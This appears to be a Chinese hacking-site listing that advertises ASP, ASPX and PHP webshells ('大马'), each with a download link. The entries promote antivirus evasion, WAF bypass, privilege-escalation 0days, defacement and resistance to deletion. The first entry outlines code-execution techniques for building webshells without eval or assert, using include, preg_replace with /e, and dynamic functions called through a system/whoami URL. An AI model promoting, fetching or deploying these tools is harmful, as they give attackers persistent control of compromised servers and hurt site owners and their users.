-
不使用eval、assert制作webshell
1、include函数实现思路:将POST过来的参数写入到一个文本里,再去包含文本实现代码执行也可以使用菜刀连接 2、preg_replace函数实现思路:使用/e修饰符实现代码执行 3、ReflectionFunction&动态函数http://127.0.0.1/code_exec.php?func_name=system&args[0]=whoami动态函数example… -
不灭之魂2018改进版本-asp大马
不灭之魂2018改进版本asp大马①在原版不灭之魂隐藏防删的基础上加上了炼魂大法,让不灭之魂永久不灭②继续集成了原版的所有提权功能③依旧霸气十足,炫酷十足,黑阔必备④去除原版后门,后门详情官网已披露,在此不必细说,原版后门(wz=ShellUrl收信)登录页面调用密码⑤修复了部分功能和去除无用功能,修复了登录页面爆密码还有参数爆密码漏洞登录界面如下:功能界面:下载地址:https://lanzou… -
土司搞基Asp大马
土司搞基Asp大马,程序为C.S.G内部群某大牛发出,估计该位大牛也是T00ls内部的人员,界面十分精美解决了很多在火狐下排版错位的问题登录界面如下:功能界面:下载地址:https://lanzoui.com/i2b5cid -
虚拟主机提权专用Webshell-asp大马
虚拟主机提权专用Webshellcaidaome.com发布免杀Asp大马登录界面如下:功能界面: 集合超强各种虚拟主机提权0day!下载地址:https://lanzoui.com/i2b4z4b -
超强提权免杀珍藏版-asp大马
超强提权免杀珍藏版-asp大马,带超强提权登录界面如下:功能界面:集合超强各种提权0day!下载地址:https://lanzoui.com/i2b56xc -
免杀Aspx大马一枚、过常见WAF!
今天在提权的时候发现的一个免杀的aspx大马,本身我用的是asp的免杀木马,由于asp马不能执行cmd,提权的时候我丢各类aspx的大马一上传就全部被隔离了,文件直接被隔离掉,生成xxx.aspx.log了,正在无助的时候,翻到有前辈的脚印! 打开一看,真是个大马。。下载地址:https://lanzoui.com/i2bssla -
Php多功能提权马
登录界面提权下面在发一个黑色的登录界面提权下载地址:https://lanzoui.com/i28shpa -
习科大马 v5.6
SilicWebshellV5.6使用手册SilicGroupHackerArmy后门管理程序欢迎使用SilicGroupHackerArmy开发的Web安全测试程序本程序基于php开发和运行,代码行数2210lines,程序大小135KB(占用空间136KB),本程序未加密,无后门。请将本脚本置于支持php的目录并访问运行,默认密码为Silic,首字母大写。目录1)主界面-登陆2)文件管理3)命… -
免杀PHP大马WebShell,支持菜刀、xise
本次更新内容:支持菜刀、xise整体优化,解决了在某些PHP版本中执行失败的问题,现已支持各种PHP版本,不管是最新的PHP7还是老版本的,皆可运行修复Cookie失效问题,不用每次关闭后都要重新登陆去除登陆界面图片,减少加载时间,主界面细节优化,已兼容各类浏览器压缩算法,文件体积优化,效率更高,上传更快更轻巧扫描木马优化,更加敏感,可彻底删除别人的木马优化批量替换、挂马、清马、命令行、MYSQL… -
PHP大马-php_mof SHELL
php木马国内首发php_mofSHELL增加mof双重提权:支持shell.users组件提权和wscript.shell执行命令,wscript.shell读取回显结果,win2003环境下测试通过。增加一些WINDOWS默认的组件提权。增加php低权限读取ROOT密码,win2003环境下测试通过。更新免杀问题。改为黑色风格。更新界面。登录界面文件管理双mof提权下载地址:https://l…